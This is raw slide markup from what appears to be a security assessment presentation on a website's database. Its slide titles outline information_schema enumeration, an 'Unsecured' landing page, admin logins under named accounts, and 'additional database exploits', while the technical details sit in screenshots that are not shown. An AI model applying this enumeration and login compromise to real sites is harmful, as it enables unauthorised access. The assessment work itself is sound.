          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1906779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sz="2800" dirty="0" err="1"/>
              <a:t>Information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>schema_privileges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDA3032D-3AC6-C51A-E3F9-923BBE13C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571" y="1890049"/>
            <a:ext cx="10078857" cy="2781688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1215392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sz="2800" dirty="0" err="1"/>
              <a:t>Information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> – tables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DF671CE-738F-9EEA-4784-E5402DB4E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400" y="1412433"/>
            <a:ext cx="10440473" cy="4871571"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3516559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dirty="0"/>
              <a:t>Landing Page</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EC7B845-323E-77A7-CAF1-E0AAD2E55EEC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="987839" y="1476728"/>
            <a:ext cx="9813200" cy="46736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2000" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface, application&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ACF56E4-FD96-F02C-D8C6-5E7AA1A65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662" y="1574930"/>
            <a:ext cx="8390676" cy="4346108"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25492B28-569E-99DF-D980-4A345E9DA797}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1841722" y="5921038"/>
            <a:ext cx="6742047" cy="22394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en-US" sz="2000" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>Unsecured</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1549101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sz="2800" dirty="0" err="1"/>
              <a:t>Information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>user_privileges</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3" descr="Text&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DFC2D45-BC69-766C-BC5A-F2C73632C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3888" y="2123893"/>
            <a:ext cx="8764223" cy="2610214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3582565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sz="2800" dirty="0" err="1"/>
              <a:t>Information_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> – Unable to retrieve</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180380" y="2000168"/>
            <a:ext cx="11037117" cy="44779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en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODEB_FT_DELETED</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_FT_INDEX_CACHE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_FT_INDEX_TABLE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_LOCKS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_LOCK_WAITS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_METRICS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_SYS_COLUMNS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_SYS_DATAFILES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_SYS_FIELDS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_SYS_FOREIGN</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_SYS_FOREIGN_COLS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_SYS_INDEXES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_SYS_TABLESPACES</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_SYS_TABLESTATS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_SYS_VIRTUAL</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_TEMP_TABLE_INFO</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>INNODB_TRX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>SESSION_STATUS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>SESSION_VARIABLES</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3096894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136EDE-418F-DF22-8FAE-10A23706362A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional vulnerability analysis</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2587039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136EDE-418F-DF22-8FAE-10A23706362A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Admin login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1439353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sz="2800" dirty="0" err="1"/>
              <a:t>Rcozart</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> - Website Admin login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180381" y="2000168"/>
            <a:ext cx="4185558" cy="44779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1600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D45DB794-80A1-86D3-9851-713744AE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118" y="1412433"/>
            <a:ext cx="8843493" cy="4808649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3929785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sz="2800" dirty="0" err="1"/>
              <a:t>Srai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> - Website Admin login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180381" y="2000168"/>
            <a:ext cx="4185558" cy="44779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1600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F673A21-7E2F-9F9B-ED8F-B59A6B5FB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372" y="1300699"/>
            <a:ext cx="9719256" cy="5277252"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A643297A-EB1F-DBBD-3255-4E74D28BB85F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332781" y="2152568"/>
            <a:ext cx="4185558" cy="44779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1600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1026469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sz="2800" dirty="0"/>
              <a:t>Entered in movie - Website Admin login</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180381" y="2000168"/>
            <a:ext cx="4185558" cy="44779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1600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A643297A-EB1F-DBBD-3255-4E74D28BB85F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332781" y="2152568"/>
            <a:ext cx="4185558" cy="44779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1600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F73F30A-755E-857F-DAB3-FFFD78840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990" y="1655239"/>
            <a:ext cx="4185558" cy="3748369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A558357F-EBD4-0BC9-C885-9EBB910DC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0698" y="5606614"/>
            <a:ext cx="8730603" cy="267894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11" descr="Graphical user interface, application, Word&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AF9021C4-D63B-A8A1-BD22-B207157992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1606" y="1655239"/>
            <a:ext cx="6877841" cy="3748369"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1861016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136EDE-418F-DF22-8FAE-10A23706362A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additional database exploits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36780656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sz="2800" dirty="0"/>
              <a:t>Database Privileges</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63C38D2F-C239-7260-0814-D85678E460B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="566671" y="1655239"/>
            <a:ext cx="11238886" cy="5009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1400" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{340BF475-95C2-B4A6-D5E7-0C9A76333FB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180381" y="2000168"/>
            <a:ext cx="4185558" cy="44779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1600" b="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A643297A-EB1F-DBBD-3255-4E74D28BB85F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="332780" y="4745864"/>
            <a:ext cx="11238885" cy="18846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en-US" sz="1600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
